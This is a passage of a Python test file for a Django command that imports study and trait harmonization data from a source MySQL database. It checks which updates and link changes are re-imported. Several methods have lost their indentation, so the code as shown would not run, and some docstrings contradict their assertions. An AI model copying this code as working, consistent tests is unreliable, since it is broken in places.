source_db_table_name = 'harmonized_trait'
field_to_update = 'description'
new_value = 'asdfghjkl'
source_db_pk_name = 'harmonized_trait_id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_description'))
self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_harmonized_trait_encoded_value(self):
        """Updates to harmonized_trait_encoded_values are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.HarmonizedTraitEncodedValue
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'harmonized_trait_encoded_values'
        field_to_update = 'value'
        new_value = 'asdfghjkl'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
# M2M link updates.
    def test_no_update_added_harmonized_trait_set_version_update_reasons(self):
        """A new reason link to an existing harmonized_trait_set_version is NOT imported after an update."""
        # Run the initial db import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Pick an allowed reason to create a new link to in the source db.
        reason = models.AllowedUpdateReason.objects.get(pk=1)
        # Find a harmonized_trait_set_version that this reason isn't linked to yet.
        linked_hts_versions = reason.harmonizedtraitsetversion_set.all()
        possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
        unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
        if len(unlinked_hts_versions) < 1:
            raise ValueError('The allowed update reason is already linked to all possible datasets.')
        hts_version_to_link = list(unlinked_hts_versions)[0]
        # Create a new hts_version-allowed_reason link in the source db.
        # Reopen the source db connection with write privileges first.
        self.cursor.close()
        self.source_db.close()
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # NOTE(review): values are interpolated directly into the SQL string; acceptable for
        # test-controlled data, but parameterized queries would be safer.
        add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
                                   harmonized_trait_set_version_id, date_added)
                                   VALUES ({}, {}, '{}');""".format(
            reason.pk, hts_version_to_link.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_reason_link_query)
        self.source_db.commit()
        self.cursor.close()
        self.source_db.close()
        # Now run the update commands.
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check that the chosen reason is still NOT linked to the hts_version in the Django db.
        reason.refresh_from_db()
        hts_version_to_link.refresh_from_db()
        self.assertFalse(hts_version_to_link in reason.harmonizedtraitsetversion_set.all())
        self.assertFalse(reason in hts_version_to_link.update_reasons.all())
    def test_no_update_removed_harmonized_trait_set_version_update_reasons(self):
        """A harmonized_trait_set_version - reason link deleted from the source db is NOT removed after update."""
        # Run the initial db import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Pick a hts_version to remove the link to in the source db.
        hts_version_to_unlink = models.HarmonizedTraitSetVersion.objects.filter(i_version=2).order_by('?').first()
        reason_to_unlink = hts_version_to_unlink.update_reasons.all().order_by('?').first()
        # Remove the link in the source db.
        # Reopen the source db connection with write privileges first.
        self.cursor.close()
        self.source_db.close()
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        remove_reason_link_query = """DELETE FROM harmonized_trait_set_version_update_reason WHERE
                                      harmonized_trait_set_version_id={} AND
                                      reason_id={}""".format(hts_version_to_unlink.pk, reason_to_unlink.pk)
        self.cursor.execute(remove_reason_link_query)
        self.source_db.commit()
        self.cursor.close()
        self.source_db.close()
        # Now run the update commands.
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check that the reason is STILL linked to the hts_version in the Django db.
        reason_to_unlink.refresh_from_db()
        hts_version_to_unlink.refresh_from_db()
        self.assertTrue(hts_version_to_unlink in reason_to_unlink.harmonizedtraitsetversion_set.all())
        self.assertTrue(reason_to_unlink in hts_version_to_unlink.update_reasons.all())
def test_no_update_add_component_source_traits(self):
"""A new component source trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[source_trait]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S')
)
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(htrait_to_link in source_trait.source_component_of_harmonized_trait.all())
self.assertFalse(hunit_to_link in source_trait.source_component_of_harmonization_unit.all())
    def test_no_update_remove_component_source_traits(self):
        """A component source trait link deleted from the source db is NOT removed."""
        # Run the initial db import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Pick a source trait to remove a link to in the source db.
        hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_source_traits=None).order_by('?').first()
        htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
        component_source_trait = hunit_to_unlink.component_source_traits.all().order_by('?').first()
        # Open source db with full privileges.
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Remove a component source trait link.
        remove_component_trait_query = """DELETE FROM component_source_trait WHERE harmonized_trait_id={} AND
            harmonization_unit_id={} AND component_trait_id={}""".format(
            htrait_to_unlink.pk, hunit_to_unlink.pk, component_source_trait.pk)
        self.cursor.execute(remove_component_trait_query)
        self.source_db.commit()
        # Close the db connection.
        self.cursor.close()
        self.source_db.close()
        # Now run the update commands.
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check that the link between these two models is STILL present in the Django db.
        component_source_trait.refresh_from_db()
        htrait_to_unlink.refresh_from_db()
        hunit_to_unlink.refresh_from_db()
        self.assertTrue(htrait_to_unlink in component_source_trait.source_component_of_harmonized_trait.all())
        self.assertTrue(hunit_to_unlink in component_source_trait.source_component_of_harmonization_unit.all())
def test_no_update_add_component_batch_traits(self):
"""A new component batch trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[source_trait]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(htrait_to_link in source_trait.batch_component_of_harmonized_trait.all())
self.assertFalse(hunit_to_link in source_trait.batch_component_of_harmonization_unit.all())
    def test_no_update_remove_component_batch_traits(self):
        """A component batch trait link deleted from the source db is NOT removed."""
        # Run the initial db import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Pick a batch trait link to remove in the source db.
        hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_batch_traits=None).order_by('?').first()
        htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
        component_batch_trait = hunit_to_unlink.component_batch_traits.all().order_by('?').first()
        # Open source db with full privileges.
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Remove a component batch trait link.
        remove_component_trait_query = """DELETE FROM component_batch_trait WHERE harmonized_trait_id={} AND
            harmonization_unit_id={} AND component_trait_id={}""".format(
            htrait_to_unlink.pk, hunit_to_unlink.pk, component_batch_trait.pk)
        self.cursor.execute(remove_component_trait_query)
        self.source_db.commit()
        # Close the db connection.
        self.cursor.close()
        self.source_db.close()
        # Now run the update commands.
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check that the link between these two models is STILL present in the Django db.
        component_batch_trait.refresh_from_db()
        htrait_to_unlink.refresh_from_db()
        hunit_to_unlink.refresh_from_db()
        self.assertTrue(htrait_to_unlink in component_batch_trait.batch_component_of_harmonized_trait.all())
        self.assertTrue(hunit_to_unlink in component_batch_trait.batch_component_of_harmonization_unit.all())
def test_no_update_add_component_age_traits(self):
"""A new component source trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[source_trait]))[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
date_added) values ('{}', '{}', '{}')""".format(
hunit_to_link.i_id, source_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(hunit_to_link in source_trait.age_component_of_harmonization_unit.all())
    def test_no_update_remove_component_age_traits(self):
        """A component age trait link deleted from the source db is NOT removed."""
        # Run the initial db import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Pick an age trait link to remove in the source db.
        hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_age_traits=None).order_by('?').first()
        component_age_trait = hunit_to_unlink.component_age_traits.all().order_by('?').first()
        # Open source db with full privileges.
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Remove a component age trait link.
        remove_component_trait_query = """DELETE FROM component_age_trait WHERE harmonization_unit_id={} AND
            component_trait_id={}""".format(
            hunit_to_unlink.pk, component_age_trait.pk)
        self.cursor.execute(remove_component_trait_query)
        self.source_db.commit()
        # Close the db connection.
        self.cursor.close()
        self.source_db.close()
        # Now run the update commands.
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check that the link between these two models is STILL present in the Django db.
        component_age_trait.refresh_from_db()
        hunit_to_unlink.refresh_from_db()
        self.assertTrue(hunit_to_unlink in component_age_trait.age_component_of_harmonization_unit.all())
def test_no_update_add_component_harmonized_trait_set_versions(self):
"""New component harmonized trait links to existing harmonized trait and harmonization unit are imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a harmonized trait set to create a new link to in the source db.
harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.get(pk=1)
# Find a harmonization_unit which this harmonized trait set isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(
component_harmonized_trait_set_versions__in=[harmonized_trait_set_version]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
harmonization_unit_id, component_trait_set_version_id, date_added) values
('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, harmonized_trait_set_version.i_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
harmonized_trait_set_version.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(
htrait_to_link in harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
self.assertFalse(
hunit_to_link in harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
    def test_no_update_remove_component_harmonized_traits(self):
        """Component harmonized trait set version links deleted from the source db are NOT removed."""
        # Run the initial db import.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Pick a component harmonized trait set version link to remove in the source db.
        hunit_to_unlink = models.HarmonizationUnit.objects.exclude(
            component_harmonized_trait_set_versions=None).order_by('?').first()
        htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
        component_harmonized_trait_set_version = hunit_to_unlink.component_harmonized_trait_set_versions.all().order_by('?').first()  # noqa: E501
        # Open source db with full privileges.
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Remove a component harmonized trait set version link.
        remove_component_trait_query = """DELETE FROM component_harmonized_trait_set WHERE harmonized_trait_id={} AND
            harmonization_unit_id={} AND component_trait_set_version_id={}""".format(
            htrait_to_unlink.pk, hunit_to_unlink.pk, component_harmonized_trait_set_version.pk)
        self.cursor.execute(remove_component_trait_query)
        self.source_db.commit()
        # Close the db connection.
        self.cursor.close()
        self.source_db.close()
        # Now run the update commands.
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check that the links between these models are STILL present in the Django db.
        component_harmonized_trait_set_version.refresh_from_db()
        htrait_to_unlink.refresh_from_db()
        hunit_to_unlink.refresh_from_db()
        self.assertTrue(
            htrait_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
        self.assertTrue(
            hunit_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
# Tests that run import_db from start to finish.
class IntegrationTest(ClearSearchIndexMixin, BaseTestDataReloadingTestCase):
"""Integration test of the whole management command.
It's very difficult to test just one function at a time here, because of
all the inter-object relationships and the data being pulled from the
source database. So just run one big integration test here rather than
nice unit tests.
"""
    @classmethod
    def setUpClass(cls):
        """Create a user to pass as --taggedtrait_creator in each test's import_db call."""
        super().setUpClass()
        cls.user = UserFactory.create()
    def test_imported_ids_match_source_ids(self):
        """import_db imports all of the primary keys for each model.

        Checks pks for every regular model and m2m link table, then loads a new
        study into the devel db, re-imports, and runs all of the checks again.
        """
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check all of the regular models.
        # The next three tuples are parallel: element i of pk_names is the pk column
        # of element i of tables, which is imported into element i of model_names.
        pk_names = (
            'id',
            'accession',
            'id',
            'id',
            'id',
            'id',
            'id',
            'id',
            'id',
            'source_trait_id',
            'harmonized_trait_id',
            'id',
            'id',
        )
        tables = (
            'global_study',
            'study',
            'source_study_version',
            'subcohort',
            'source_dataset',
            'harmonized_trait_set',
            'allowed_update_reason',
            'harmonized_trait_set_version',
            'harmonization_unit',
            'source_trait',
            'harmonized_trait',
            'source_trait_encoded_values',
            'harmonized_trait_encoded_values',
        )
        model_names = (
            models.GlobalStudy,
            models.Study,
            models.SourceStudyVersion,
            models.Subcohort,
            models.SourceDataset,
            models.HarmonizedTraitSet,
            models.AllowedUpdateReason,
            models.HarmonizedTraitSetVersion,
            models.HarmonizationUnit,
            models.SourceTrait,
            models.HarmonizedTrait,
            models.SourceTraitEncodedValue,
            models.HarmonizedTraitEncodedValue,
        )
        self.check_imported_pks_match(pk_names, tables, model_names)
        # Check all of the M2M relationships.
        # These five tuples are also parallel, one element per m2m link table.
        # component_source_trait / component_harmonized_trait_set / component_batch_trait
        # each appear twice: once grouped by harmonized_trait_id, once by
        # harmonization_unit_id. component_age_trait links only to harmonization units.
        m2m_tables = (
            'component_source_trait',
            'component_harmonized_trait_set',
            'component_batch_trait',
            'component_age_trait',
            'component_source_trait',
            'component_harmonized_trait_set',
            'component_batch_trait',
            'harmonized_trait_set_version_update_reason',
        )
        group_by_fields = (
            'harmonized_trait_id',
            'harmonized_trait_id',
            'harmonized_trait_id',
            'harmonization_unit_id',
            'harmonization_unit_id',
            'harmonization_unit_id',
            'harmonization_unit_id',
            'harmonized_trait_set_version_id',
        )
        concat_fields = (
            'component_trait_id',
            'component_trait_set_version_id',
            'component_trait_id',
            'component_trait_id',
            'component_trait_id',
            'component_trait_set_version_id',
            'component_trait_id',
            'reason_id',
        )
        parent_models = (
            models.HarmonizedTrait,
            models.HarmonizedTrait,
            models.HarmonizedTrait,
            models.HarmonizationUnit,
            models.HarmonizationUnit,
            models.HarmonizationUnit,
            models.HarmonizationUnit,
            models.HarmonizedTraitSetVersion,
        )
        m2m_att_names = (
            'component_source_traits',
            'component_harmonized_trait_set_versions',
            'component_batch_traits',
            'component_age_traits',
            'component_source_traits',
            'component_harmonized_trait_set_versions',
            'component_batch_traits',
            'update_reasons',
        )
        self.check_imported_m2m_relations_match(
            m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
        # Load a new study and run all of these checks again.
        # Close the connections first; load_test_source_db_data and the management
        # command use their own connections.
        self.cursor.close()
        self.source_db.close()
        load_test_source_db_data('new_study.sql')
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Check all of the regular models again.
        self.check_imported_pks_match(pk_names, tables, model_names)
        # Check all of the M2M relationships again.
        self.check_imported_m2m_relations_match(
            m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
        # Check that search indices are added: every imported trait should be in the
        # watson index (an empty search string matches everything indexed).
        self.assertEqual(watson.filter(models.SourceTrait, '').count(),
                         models.SourceTrait.objects.all().count())
        self.assertEqual(watson.filter(models.HarmonizedTrait, '').count(),
                         models.HarmonizedTrait.objects.all().count())
    def test_updated_data_from_every_table(self):
        """Every kind of update is detected and imported by import_db.

        Makes one change in every updatable regular table, adds one new link in
        every m2m table of the source db, reruns import_db with --update_only, and
        checks that each change shows up in the Django db with modified > t1.
        """
        # This test is largely just all of the methods from UpdateModelsTestCase all put together.
        # Initial call of the import command.
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        t1 = timezone.now()
        new_value = 'asdfghjkl' # Use this value to reset things in multiple models.
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        # Update the global study table.
        global_study = models.GlobalStudy.objects.all()[0]
        # Sleep so the modified timestamps end up strictly greater than t1.
        sleep(1)
        change_data_in_table(
            'global_study', 'name', new_value, global_study._meta.pk.name.replace('i_', ''), global_study.pk)
        # Update the study table.
        study = models.Study.objects.all()[0]
        change_data_in_table('study', 'study_name', new_value, study._meta.pk.name.replace('i_', ''), study.pk)
        # Update the source study version table.
        source_study_version = models.SourceStudyVersion.objects.all()[0]
        new_is_deprecated = int(not source_study_version.i_is_deprecated)
        change_data_in_table(
            'source_study_version', 'is_deprecated', new_is_deprecated,
            source_study_version._meta.pk.name.replace('i_', ''), source_study_version.pk)
        # Update source dataset table.
        source_dataset = models.SourceDataset.objects.all()[0]
        new_description = '23oriuam.sadflkj'
        change_data_in_table(
            'source_dataset', 'dbgap_description', new_description, source_dataset._meta.pk.name.replace('i_', ''),
            source_dataset.pk)
        # Update the subcohort table.
        subcohort = models.Subcohort.objects.get(pk=1)
        change_data_in_table('subcohort', 'name', new_value, subcohort._meta.pk.name.replace('i_', ''), subcohort.pk)
        # Update source trait table.
        source_trait = models.SourceTrait.objects.all()[0]
        change_data_in_table('source_trait', 'dbgap_comment', new_value, 'source_trait_id', source_trait.pk)
        # Update source trait encoded values table.
        sev = models.SourceTraitEncodedValue.objects.all()[0]
        change_data_in_table(
            'source_trait_encoded_values', 'value', new_value, sev._meta.pk.name.replace('i_', ''), sev.pk)
        # Update harmonized trait set table.
        harmonized_trait_set = models.HarmonizedTraitSet.objects.all()[0]
        change_data_in_table(
            'harmonized_trait_set', 'trait_set_name', new_value, harmonized_trait_set._meta.pk.name.replace('i_', ''),
            harmonized_trait_set.pk)
        # Update harmonized trait set version table.
        harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.all()[0]
        change_data_in_table(
            'harmonized_trait_set_version', 'harmonized_by',
            new_value, harmonized_trait_set_version._meta.pk.name.replace('i_', ''), harmonized_trait_set_version.pk
        )
        # Don't update allowed update reason table, because it should NOT change.
        # Update harmonization unit table.
        harmonization_unit = models.HarmonizationUnit.objects.all()[0]
        change_data_in_table(
            'harmonization_unit', 'tag', new_value, harmonization_unit._meta.pk.name.replace('i_', ''),
            harmonization_unit.pk
        )
        # Update harmonized trait table.
        harmonized_trait = models.HarmonizedTrait.objects.all()[0]
        change_data_in_table('harmonized_trait', 'description', new_value, 'harmonized_trait_id', harmonized_trait.pk)
        # Update harmonized trait encoded values table.
        hev = models.HarmonizedTraitEncodedValue.objects.all()[0]
        change_data_in_table(
            'harmonized_trait_encoded_values', 'value', new_value, hev._meta.pk.name.replace('i_', ''), hev.pk)
        # Prep for doing updates for m2m tables.
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Add a component source trait.
        # Pick a harmonization unit that is not yet linked to the chosen trait.
        component_source_trait = models.SourceTrait.objects.order_by('?').first()
        hunit_to_link_source = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[component_source_trait]))[0]
        htrait_to_link_source = hunit_to_link_source.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
        add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
            component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
                htrait_to_link_source.i_trait_id, hunit_to_link_source.i_id, component_source_trait.i_trait_id,
                timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_component_trait_query)
        self.source_db.commit()
        # Add a component batch trait.
        component_batch_trait = models.SourceTrait.objects.order_by('?').first()
        hunit_to_link_batch = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[component_batch_trait]))[0]
        htrait_to_link_batch = hunit_to_link_batch.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
        add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
            component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
                htrait_to_link_batch.i_trait_id, hunit_to_link_batch.i_id, component_batch_trait.i_trait_id,
                timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_component_trait_query)
        self.source_db.commit()
        # NOTE(review): the LAST_INSERT_ID() result is never fetched — looks like a
        # leftover debug query; harmless on a buffered cursor.
        self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
        # Add a component age trait (links to a harmonization unit only, no trait).
        component_age_trait = models.SourceTrait.objects.order_by('?').first()
        hunit_to_link_age = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[component_age_trait]))[0]
        add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
            date_added) values ('{}', '{}', '{}')""".format(
                hunit_to_link_age.i_id, component_age_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_component_trait_query)
        self.source_db.commit()
        # NOTE(review): result unused here as well — leftover debug query.
        self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
        # Add a component harmonized trait set version.
        component_harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.order_by('?').first()
        hunit_to_link_harmonized = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(
                component_harmonized_trait_set_versions__in=[component_harmonized_trait_set_version]))[0]
        htrait_to_link_harmonized = hunit_to_link_harmonized.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
        add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
            harmonization_unit_id, component_trait_set_version_id, date_added) values
            ('{}', '{}', '{}', '{}')""".format(
                htrait_to_link_harmonized.i_trait_id, hunit_to_link_harmonized.i_id,
                component_harmonized_trait_set_version.i_id,
                timezone.now().strftime('%Y-%m-%d %H:%M:%S')
        )
        # This insert is committed by the commit after the reason link below (same connection).
        self.cursor.execute(add_component_trait_query)
        # Add an update reason to a harmonized trait set version.
        reason_to_link = models.AllowedUpdateReason.objects.get(pk=1)
        linked_hts_versions = reason_to_link.harmonizedtraitsetversion_set.all()
        possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
        unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
        hts_version_to_link_reason = list(unlinked_hts_versions)[0]
        add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
            harmonized_trait_set_version_id, date_added)
            VALUES ({}, {}, '{}');""".format(
                reason_to_link.pk, hts_version_to_link_reason.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_reason_link_query)
        self.source_db.commit()
        # Close the db connection.
        self.cursor.close()
        self.source_db.close()
        # Run the update command.
        management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Refresh models from the db.
        global_study.refresh_from_db()
        study.refresh_from_db()
        source_study_version.refresh_from_db()
        source_dataset.refresh_from_db()
        subcohort.refresh_from_db()
        source_trait.refresh_from_db()
        sev.refresh_from_db()
